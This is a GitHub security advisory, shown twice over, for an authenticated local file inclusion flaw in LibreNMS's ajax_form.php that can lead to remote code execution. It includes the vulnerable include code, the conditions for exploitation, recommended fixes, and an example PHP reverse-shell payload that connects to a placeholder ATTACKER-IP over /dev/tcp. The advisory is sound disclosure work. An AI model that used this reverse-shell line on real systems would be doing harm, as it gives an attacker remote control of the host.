Headline
GHSA-gq96-8w38-hhj2: LibreNMS has Authenticated Local File Inclusion in ajax_form.php that Allows RCE
LibreNMS 25.6.0 contains an architectural vulnerability in the ajax_form.php endpoint that permits Local File Inclusion (LFI) based on user-controlled POST input.
The application directly uses the type parameter to dynamically include .inc.php files from the trusted path includes/html/forms/, without validation or allowlisting:
if (file_exists('includes/html/forms/' . $_POST['type'] . '.inc.php')) {
include_once 'includes/html/forms/' . $_POST['type'] . '.inc.php';
}
This pattern introduces a latent Remote Code Execution (RCE) vector if an attacker can stage a file in this include path — for example, via symlink, development misconfiguration, or chained vulnerabilities.
This is not an arbitrary file upload bug. But it does provide a powerful execution sink for attackers with write access (direct or indirect) to the include directory.
Conditions for Exploitation
- Attacker must be authenticated
- Attacker must control a file at
includes/html/forms/{type}.inc.php(or symlink)
Example Impact (RCE)
If a PHP file or symlinked shell is staged in the include path, an attacker can achieve full remote code execution under the librenms user context:
<?php system('/bin/bash -c "bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1"'); ?>
https://github.com/user-attachments/assets/deb9ccd2-101c-4172-89b1-b840b7ed3812
Recommended Fix
- Implement strict allow listing or hardcoded routing instead of dynamically including user-supplied filenames.
- Avoid passing raw POST input into
include_once. - Ensure the inclusion path is immutable and outside attacker control (e.g., avoid variable expansion into trusted paths).
- GitHub Advisory Database
- GitHub Reviewed
- CVE-2025-54138
LibreNMS has Authenticated Local File Inclusion in ajax_form.php that Allows RCE
High severity GitHub Reviewed Published Jul 21, 2025 in librenms/librenms • Updated Jul 21, 2025
Package
composer librenms/librenms (Composer)
Affected versions
< 25.7.0
LibreNMS 25.6.0 contains an architectural vulnerability in the ajax_form.php endpoint that permits Local File Inclusion (LFI) based on user-controlled POST input.
The application directly uses the type parameter to dynamically include .inc.php files from the trusted path includes/html/forms/, without validation or allowlisting:
if (file_exists(‘includes/html/forms/’ . $_POST[‘type’] . ‘.inc.php’)) { include_once ‘includes/html/forms/’ . $_POST[‘type’] . '.inc.php’; }
This pattern introduces a latent Remote Code Execution (RCE) vector if an attacker can stage a file in this include path — for example, via symlink, development misconfiguration, or chained vulnerabilities.
This is not an arbitrary file upload bug. But it does provide a powerful execution sink for attackers with write access (direct or indirect) to the include directory.
Conditions for Exploitation
- Attacker must be authenticated
- Attacker must control a file at includes/html/forms/{type}.inc.php (or symlink)
Example Impact (RCE)
If a PHP file or symlinked shell is staged in the include path, an attacker can achieve full remote code execution under the librenms user context:
<?php system(‘/bin/bash -c "bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1"’); ?>
https://github.com/user-attachments/assets/deb9ccd2-101c-4172-89b1-b840b7ed3812
Recommended Fix
- Implement strict allow listing or hardcoded routing instead of dynamically including user-supplied filenames.
- Avoid passing raw POST input into include_once.
- Ensure the inclusion path is immutable and outside attacker control (e.g., avoid variable expansion into trusted paths).
References
- GHSA-gq96-8w38-hhj2
- librenms/librenms#17990
- librenms/librenms@ec89714
- https://github.com/librenms/librenms/releases/tag/25.7.0
Published to the GitHub Advisory Database
Jul 21, 2025
Last updated
Jul 21, 2025